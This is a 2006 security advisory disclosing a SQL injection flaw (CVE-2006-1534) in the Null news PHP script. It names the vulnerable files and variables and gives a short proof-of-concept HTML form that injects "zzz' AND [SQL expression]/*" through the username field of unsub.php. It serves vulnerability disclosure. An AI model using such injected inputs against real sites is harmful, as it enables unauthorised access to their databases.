SQL Injection Vulnerability in Null news
Summary
- Vulnerability
- SQL Injection Vulnerability in Null news
- Discovered
- 2006.03.28
- Last Update
- 2006.04.07 Exploitation code published
- ID
- EV0109
- CVE
- CVE-2006-1534
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- Null news (http://nullbranded.tk/)
- Version
- 2005.07.27
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in Null news (http://nullbranded.tk/) script.
Vulnerable scripts:
lostpass.php
sub.php
unsub.php
Variables $user_email(lostpass.php), $user_email(sub.php,unsub.php), $user_username(sub.php,unsub.php) are not properly sanitized before being used in SQL queries. This can be used to evaluate arbitrary SQL expression.
Condition: magic_quotes_gpc = off
PoC/Exploit
SQL Injection Example:
<form action=http://[host]/unsub.php method=post>
<input name=email value=aaa@aaa.com>
<input name=username value="zzz' AND [SQL expression]/*">
<input name=password value=aaa>
<input type=submit>
</form>
Solution.
Solution for "SQL Injection Vulnerability in Null news" is not available. Check vendor's website for updates.